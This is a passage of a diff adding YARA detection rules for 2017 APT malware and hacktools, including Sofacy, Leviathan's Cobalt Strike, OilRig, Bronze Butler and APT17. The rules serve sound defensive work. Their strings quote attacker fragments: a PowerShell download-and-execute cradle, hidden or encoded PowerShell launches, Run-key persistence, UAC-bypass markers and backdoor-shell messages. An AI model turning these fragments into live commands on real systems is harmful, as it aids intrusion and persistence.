+      reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+      date = "2017-10-23 09:28:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "522fd9b35323af55113455d823571f71332e53dde988c2eb41395cf6b0c15805"
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA, T1085"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "%localappdata%\\netwf.dll" fullword wide
+      $x2 = "set path = \"%localappdata%\\netwf.dll\"" fullword ascii
+      $x3 = "%localappdata%\\netwf.bat" fullword wide
+      $x4 = "KlpSvc.dll" fullword ascii
+      $g1 = "set path = \"%localappdata%\\" ascii
+      $g2 = "%localappdata%\\" wide
+      $s1 = "start rundll32.exe %path %,#1a" fullword ascii
+      $s2 = "gshell32" fullword wide
+      $s3 = "s - %lu" fullword ascii
+      $s4 = "be run i" fullword ascii
+      $s5 = "ingToBinhary" fullword ascii
+      $s6 = "%j%Xjs" fullword ascii
+      $s7 = "if NOT exist %path % (exit)" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a2d1be6502b4b3c28959a4fb0196ea45" or pe.exports ( "KlpSvc" ) or ( 1 of ( $x* ) or 4 of them ) or ( $s1 and all of ( $g* ) ) )
+}
+
+rule Sofacy_Oct17_2_RID2BF4 : APT DEMO EXE FILE G0007 MAL RUSSIA {
+   meta:
+      description = "Detects Sofacy malware reported in October 2017"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+      date = "2017-10-23 09:28:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18"
+      tags = "APT, DEMO, EXE, FILE, G0007, MAL, RUSSIA"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "netwf.dll" fullword wide
+      $s1 = "%s - %s - %2.2x" fullword wide
+      $s2 = "%s - %lu" fullword ascii
+      $s3 = "%s \"%s\", %s" fullword wide
+      $s4 = "%j%Xjsf" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 90KB and ( pe.imphash ( ) == "13344e2a717849489bcd93692f9646f7" or ( 4 of them ) ) ) or ( all of them )
+}
+
+rule TA17_293A_Hacktool_PS_1_RID2E72 : APT DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+      date = "2017-10-21 11:14:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "72a28efb6e32e653b656ca32ccd44b3111145a695f6f6161965deebbdc437076"
+      tags = "APT, DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$HashFormat = '$krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Service,OU=Accounts,OU=EnterpriseObjects,DC=asdf,DC=pd,DC=f" ascii
+      $x2 = "} | Where-Object {$_.SamAccountName -notmatch 'krbtgt'} | Get-SPNTicket @GetSPNTicketArguments" fullword ascii
+   condition: 
+      ( filesize < 80KB and 1 of them )
+}
+
+rule TA17_293A_Hacktool_Touch_MAC_modification_RID35C7 : APT DEMO EXE FILE HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+      date = "2017-10-21 16:27:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "070d7082a5abe1112615877214ec82241fd17e5bd465e24d794a470f699af88e"
+      tags = "APT, DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-t time - use the time specified to update the access and modification times" fullword ascii
+      $s2 = "Failed to set file times for %s. Error: %x" fullword ascii
+      $s3 = "touch [-acm][ -r ref_file | -t time] file..." fullword ascii
+      $s4 = "-m - change the modification time only" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule TA17_293A_Hacktool_Exploit_MS16_032_RID327E : APT DEMO EXPLOIT HKTL {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+      date = "2017-10-21 14:07:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9b97290300abb68fb48480718e6318ee2cdd4f099aa6438010fb2f44803e0b58"
+      tags = "APT, DEMO, EXPLOIT, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread)))" ascii
+      $x2 = "0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\"," fullword ascii
+      $x3 = "PowerShell implementation of MS16-032. The exploit targets all vulnerable" fullword ascii
+      $x4 = "If we can't open the process token it's a SYSTEM shell!" fullword ascii
+   condition: 
+      ( filesize < 40KB and 1 of them )
+}
+
+rule Imphash_UPX_Packed_Malware_1_TA17_293A_RID3430 : APT DEMO EXE FILE MAL T1045 {
+   meta:
+      description = "Detects malware based on Imphash of malware used in TA17-293A"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+      date = "2017-10-21 15:19:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a278256fbf2f061cfded7fdd58feded6765fade730374c508adad89282f67d77"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1045"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "d7d745ea39c8c5b82d5e153d3313096c" )
+}
+
+rule Imphash_Malware_2_TA17_293A_RID302E : APT DEMO EXE FILE HIGHVOL MAL {
+   meta:
+      description = "Detects malware based on Imphash of malware used in TA17-293A"
+      author = "Florian Roth"
+      reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+      date = "2017-10-21 12:28:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, HIGHVOL, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "a8f69eb2cf9f30ea96961c86b4347282" )
+}
+
+rule Leviathan_CobaltStrike_Sample_1_RID3324 : APT COBALTSTRIKE DEMO EXE FILE G0065 S0154 T1075 T1105 {
+   meta:
+      description = "Detects Cobalt Strike sample from Leviathan report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/MZ7dRg"
+      date = "2017-10-18 14:35:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362"
+      tags = "APT, COBALTSTRIKE, DEMO, EXE, FILE, G0065, S0154, T1075, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "a54c81.dll" fullword ascii
+      $x2 = "%d is an x64 process (can't inject x86 content)" fullword ascii
+      $x3 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+      $s1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+      $s2 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+      $s3 = "could not run command (w/ token) because of its length of %d bytes!" fullword ascii
+      $s4 = "could not write to process memory: %d" fullword ascii
+      $s5 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+      $s6 = "Could not connect to pipe (%s): %d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule MockDll_Gen_RID2B30 : APT DEMO EXE FILE GEN {
+   meta:
+      description = "Detects MockDll - regsvr DLL loader"
+      author = "Florian Roth"
+      reference = "https://goo.gl/MZ7dRg"
+      date = "2017-10-18 08:55:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bfc5c6817ff2cc4f3cd40f649e10cc9ae1e52139f35fdddbd32cb4d221368922"
+      hash2 = "80b931ab1798d7d8a8d63411861cee07e31bb9a68f595f579e11d3817cfc4aca"
+      tags = "APT, DEMO, EXE, FILE, GEN"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "mock_run_ini_Win32.dll" fullword ascii
+      $x2 = "mock_run_ini_x64.dll" fullword ascii
+      $s1 = "RealCmd=%s %s" fullword ascii
+      $s2 = "MockModule=%s" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or 2 of them )
+}
+
+rule VBScript_Favicon_File_RID2F22 : ANOMALY APT DEMO FILE G0065 T1170 {
+   meta:
+      description = "VBScript cloaked as Favicon file used in Leviathan incident"
+      author = "Florian Roth"
+      reference = "https://goo.gl/MZ7dRg"
+      date = "2017-10-18 11:44:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36"
+      tags = "ANOMALY, APT, DEMO, FILE, G0065, T1170"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "myxml = '<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\"?>';myxml = myxml +'<root>" ascii
+      $x2 = ".Run \"taskkill /im mshta.exe" ascii
+      $x3 = "<script language=\"VBScript\">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 :" ascii
+      $s1 = ".ExpandEnvironmentStrings(\"%ALLUSERSPROFILE%\") &" ascii
+      $s2 = ".ExpandEnvironmentStrings(\"%temp%\") & " ascii
+   condition: 
+      filesize < 100KB and ( uint16 ( 0 ) == 0x733c and 1 of ( $x* ) ) or ( 3 of them )
+}
+
+rule OilRig_Strings_Oct17_RID2E8D : APT DEMO G0049 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects strings from OilRig malware and malicious scripts"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/"
+      date = "2017-10-18 11:19:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      tags = "APT, DEMO, G0049, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%localappdata%\\srvHealth.exe" fullword wide ascii
+      $x2 = "%localappdata%\\srvBS.txt" fullword wide ascii
+      $x3 = "Agent Injector\\PolicyConverter\\Inner\\obj\\Release\\Inner.pdb" ascii
+      $x4 = "Agent Injector\\PolicyConverter\\Joiner\\obj\\Release\\Joiner.pdb" ascii
+      $s3 = ".LoadDll(\"Run\", arg, \"C:\\\\Windows\\\\" ascii
+   condition: 
+      filesize < 800KB and 1 of them
+}
+
+rule OilRig_ISMAgent_Campaign_Samples2_RID3373 : APT DEMO EXE FILE G0049 MAL MIDDLE_EAST T1121 {
+   meta:
+      description = "Detects OilRig malware from Unit 42 report in October 2017"
+      author = "Florian Roth"
+      reference = "https://goo.gl/JQVfFP"
+      date = "2017-10-18 14:48:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fcad263d0fe2b418db05f47d4036f0b42aaf201c9b91281dfdcb3201b298e4f4"
+      hash2 = "33c187cfd9e3b68c3089c27ac64a519ccc951ccb3c74d75179c520f54f11f647"
+      tags = "APT, DEMO, EXE, FILE, G0049, MAL, MIDDLE_EAST, T1121"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "PolicyConverter.exe" fullword wide
+      $x2 = "SrvHealth.exe" fullword wide
+      $x3 = "srvBS.txt" fullword wide
+      $s1 = "{a3538ba3-5cf7-43f0-bc0e-9b53a98e1643}, PublicKeyToken=3e56350693f7355e" fullword wide
+      $s2 = "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegAsm.exe" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 700KB and ( 2 of ( $x* ) or 3 of them )
+}
+
+rule BronzeButler_Daserf_Delphi_1_RID31E8 : APT CHINA DEMO EXE FILE G0060 HKTL MAL {
+   meta:
+      description = "Detects malware / hacktool sample from Bronze Butler incident"
+      author = "Florian Roth"
+      reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+      date = "2017-10-14 13:42:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2020-11-30"
+      hash1 = "89a80ca92600af64eb9c32cab4e936c7d675cf815424d72438973e2d6788ef64"
+      hash2 = "b1bd03cd12638f44d9ace271f65645e7f9b707f86e9bcf790e0e5a96b755556b"
+      hash3 = "22e1965154bdb91dd281f0e86c8be96bf1f9a1e5fe93c60a1d30b79c0c0f0d43"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0060, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Services.exe" fullword ascii
+      $s2 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
+      $s3 = "l32.dll" fullword ascii
+      $s4 = "tProcess:" fullword ascii
+      $s5 = " InjectPr" ascii
+      $s6 = "Write$Error creating variant or safe array\x1fInvalid argument to time encode" fullword wide
+      $s7 = "on\\run /v " fullword ascii
+      $s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
+      $s9 = "ms1ng2d3d2.exe" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+}
+
+rule BronzeButler_Daserf_C_1_RID2FD5 : APT CHINA DEMO EXE FILE G0060 HKTL MAL {
+   meta:
+      description = "Detects malware / hacktool sample from Bronze Butler incident"
+      author = "Florian Roth"
+      reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+      date = "2017-10-14 12:14:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a4afd9df1b4cc014c3a89d7b4a560fa3e368b02286c42841762714b23e68cc05"
+      hash2 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
+      hash3 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0060, HKTL, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com." fullword ascii
+      $s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)" fullword ascii
+      $a1 = "ndkkwqgcm" fullword ascii
+      $a2 = "RtlGetCo" fullword ascii
+      $a3 = "hutils" fullword ascii
+      $b1 = "%USERPROFILE%\\System" fullword ascii
+      $b2 = "msid.dat" fullword ascii
+      $b3 = "DRIVE_REMOTE" fullword wide
+      $b4 = "%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
+      $b5 = "jcbhe.asp" fullword ascii
+      $b6 = "edset.asp" fullword ascii
+      $b7 = "bxcve.asp" fullword ascii
+      $b8 = "hcvery.php" fullword ascii
+      $b9 = "ynhkef.php" fullword ascii
+      $b10 = "dkgwey.php" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "088382f4887e3b2c4bd5157f2d72b618" or all of ( $a* ) or 4 of them )
+}
+
+rule BronzeButler_DGet_1_RID2E42 : APT CHINA DEMO EXE FILE G0060 HKTL MAL {
+   meta:
+      description = "Detects malware / hacktool sample from Bronze Butler incident"
+      author = "Florian Roth"
+      reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+      date = "2017-10-14 11:06:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "bd81521445639aaa5e3bcb5ece94f73feda3a91880a34a01f92639f8640251d6"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0060, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s2 = "DGet Tool Made by XZ" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
+}
+
+rule BronzeButler_UACBypass_1_RID3029 : APT CHINA DEMO EXE FILE G0060 HKTL MAL {
+   meta:
+      description = "Detects malware / hacktool sample from Bronze Butler incident"
+      author = "Florian Roth"
+      reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
+      date = "2017-10-14 12:28:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "fe06b99a0287e2b2d9f7faffbda3a4b328ecc05eab56a3e730cfc99de803b192"
+      tags = "APT, CHINA, DEMO, EXE, FILE, G0060, HKTL, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\Release\\BypassUacDll.pdb" ascii
+      $x2 = "%programfiles%internet exploreriexplore.exe" fullword wide
+      $x3 = "Elevation:Administrator!new:{3ad055" fullword wide
+      $x4 = "BypassUac.pdb" fullword ascii
+      $x5 = "[bypassUAC] started X64" fullword wide
+      $x6 = "[bypassUAC] started X86" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them )
+}
+
+rule Saudi_Phish_Trojan_RID2E2F : DEMO EXE FILE MAL T1193 T1203 {
+   meta:
+      description = "Detects a trojan used in Saudi Aramco Phishing"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Z3JUAA"
+      date = "2017-10-12 11:03:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8ad94dc5d59aa1e9962c76fd5ca042e582566049a97aef9f5730ba779e5ebb91"
+      tags = "DEMO, EXE, FILE, MAL, T1193, T1203"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = { 7B 00 30 00 7D 00 7B 00 31 00 7D 00 5C 00 00 09
+               2E 00 64 00 6C 00 6C 00 00 11 77 00 33 00 77 00
+               70 00 2E 00 65 00 78 00 65 00 00 1B 61 00 73 00
+               70 00 6E 00 65 00 74 00 5F 00 77 00 70 00 2E 00
+               65 00 78 00 65 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
+}
+
+rule BKDR_Snarasite_Oct17_RID2E2A : DEMO EXE FILE MAL {
+   meta:
+      description = "Semiautomatically generated YARA rule"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-10-07 11:02:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "36ba92cba23971ca9d16a0b4f45c853fd5b3108076464d5f2027b0f56054fd62"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "322bef04e1e1ac48875036e38fb5c23c" or pe.imphash ( ) == "15088754757513c92fa36ba5590e907b" )
+}
+
+rule FreeMilk_APT_Mal_2_RID2D6E : APT DEMO EXE FILE MAL T1113 {
+   meta:
+      description = "Detects malware from FreeMilk campaign"
+      author = "Florian Roth"
+      reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+      date = "2017-10-05 10:31:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7f35521cdbaa4e86143656ff9c52cef8d1e5e5f8245860c205364138f82c54df"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1113"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "failed to take the screenshot. err: %d" fullword ascii
+      $s2 = "runsample" fullword wide
+      $s3 = "%s%02X%02X%02X%02X%02X%02X:" fullword wide
+      $s4 = "win-%d.%d.%d-%d" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "b86f7d2c1c182ec4c074ae1e16b7a3f5" or all of them )
+}
+
+rule URL_File_Local_EXE_RID2D6E : DEMO SCRIPT T1064 {
+   meta:
+      description = "Detects an .url file that points to a local executable"
+      author = "Florian Roth"
+      reference = "https://twitter.com/malwareforme/status/915300883012870144"
+      date = "2017-10-04 10:31:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1064"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $s1 = "[InternetShortcut]" ascii wide fullword
+      $s2 = /URL=file:\/\/\/C:\\[^\n]{1,50}\.exe/ 
+   condition: 
+      filesize < 400 and all of them
+}
+
+rule CMStar_Malware_Sep17_RID2E52 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects CMStar Malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/pTffPA"
+      date = "2017-10-03 11:09:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5"
+      tags = "DEMO, EXE, FILE, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $s1 = "UpdateService.tmp" fullword ascii
+      $s2 = "StateNum:%d,FileSize:%d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "22021985de78a48ea8fb82a2ff9eb693" or pe.exports ( "WinCred" ) or all of them )
+}
+
+rule APT17_Malware_Oct17_2_RID2E04 : APT DEMO EXE FILE G0025 MAL {
+   meta:
+      description = "Detects APT17 malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/puVc9q"
+      date = "2017-10-03 10:56:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "20cd49fd0f244944a8f5ba1d7656af3026e67d170133c1b3546c8b2de38d4f27"
+      tags = "APT, DEMO, EXE, FILE, G0025, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $x1 = "Cookie: __xsptplus=%s" fullword ascii
+      $x2 = "http://services.fiveemotions.co.jp" fullword ascii
+      $x3 = "http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif" fullword ascii
+      $s1 = "FoxHTTPClient_EXE_x86.exe" fullword ascii
+      $s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.3072" ascii
+      $s3 = "hWritePipe2 Error:%d" fullword ascii
+      $s4 = "Not Support This Function!" fullword ascii
+      $s5 = "Global\\PnP_No_Management" fullword ascii
+      $s6 = "Content-Type: image/x-png" fullword ascii
+      $s7 = "Accept-Language: ja-JP" fullword ascii
+      $s8 = "IISCMD Error:%d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and ( pe.exports ( "_foo@0" ) or 1 of ( $x* ) or 6 of them )
+}
+
+rule APT17_Unsigned_Symantec_Binary_EFA_RID338C : APT DEMO EXE FILE G0025 MAL {
+   meta:
+      description = "Detects APT17 malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/puVc9q"
+      date = "2017-10-03 14:52:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f"
+      tags = "APT, DEMO, EXE, FILE, G0025, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "Copyright (c) 2007 - 2011 Symantec Corporation" fullword wide
+      $s2 = "\\\\.\\SYMEFA" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.number_of_signatures == 0 )
+}
+
+rule APT17_Malware_Oct17_Gen_RID2EEC : APT DEMO EXE FILE G0025 GEN MAL {
+   meta:
+      description = "Detects APT17 malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/puVc9q"
+      date = "2017-10-03 11:35:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0375b4216334c85a4b29441a3d37e61d7797c2e1cb94b14cf6292449fb25c7b2"
+      hash2 = "07f93e49c7015b68e2542fc591ad2b4a1bc01349f79d48db67c53938ad4b525d"
+      hash3 = "ee362a8161bd442073775363bf5fa1305abac2ce39b903d63df0d7121ba60550"
+      tags = "APT, DEMO, EXE, FILE, G0025, GEN, MAL"
+      required_modules = "pe"
+      minimum_yara = "3.2.0"
+      
+   strings:
+      $x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)" fullword ascii
+      $x2 = "http://%s/imgres?q=A380&hl=en-US&sa=X&biw=1440&bih=809&tbm=isus&tbnid=aLW4-J8Q1lmYBM" ascii
+      $s1 = "hWritePipe2 Error:%d" fullword ascii
+      $s2 = "Not Support This Function!" fullword ascii
+      $s3 = "Cookie: SESSIONID=%s" fullword ascii
+      $s4 = "http://0.0.0.0/1" fullword ascii
+      $s5 = "Content-Type: image/x-png" fullword ascii
+      $s6 = "Accept-Language: en-US" fullword ascii
+      $s7 = "IISCMD Error:%d" fullword ascii
+      $s8 = "[IISEND=0x%08X][Recv:] 0x%08X %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "414bbd566b700ea021cfae3ad8f4d9b9" or 1 of ( $x* ) or 6 of them ) )
+}
+
+rule redSails_EXE_RID2B89 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects Red Sails Hacktool by WinDivert references"
+      author = "Florian Roth"
+      reference = "https://github.com/BeetleChunks/redsails"
+      date = "2017-10-02 09:10:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7a7861d25b0c038d77838ecbd5ea5674650ad4f5faf7432a6f3cfeb427433fac"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "bWinDivert64.dll" fullword ascii
+      $s2 = "bWinDivert32.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 6000KB and all of them )
+}
+
+rule redSails_PY_RID2B50 : DEMO HKTL SCRIPT T1059_006 {
+   meta:
+      description = "Detects Red Sails Hacktool - Python"
+      author = "Florian Roth"
+      reference = "https://github.com/BeetleChunks/redsails"
+      date = "2017-10-02 09:01:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661"
+      hash2 = "5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e"
+      tags = "DEMO, HKTL, SCRIPT, T1059_006"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Gained command shell on host" fullword ascii
+      $x2 = "[!] Received an ERROR in shell()" fullword ascii
+      $x3 = "Target IP address with backdoor installed" fullword ascii
+      $x4 = "Open backdoor port on target machine" fullword ascii
+      $x5 = "Backdoor port to open on victim machine" fullword ascii
+   condition: 
+      1 of them
+}
+
+rule Susp_PowerShell_Sep17_1_RID2F9F : ANOMALY DEMO SCRIPT SUSP T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects suspicious PowerShell script in combo with VBS or JS "
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-09-30 12:05:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "8e28521749165d2d48bfa1eac685c985ac15fc9ca5df177d4efadf9089395c56"
+      tags = "ANOMALY, DEMO, SCRIPT, SUSP, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Process.Create(\"powershell.exe -nop -w hidden" fullword ascii nocase
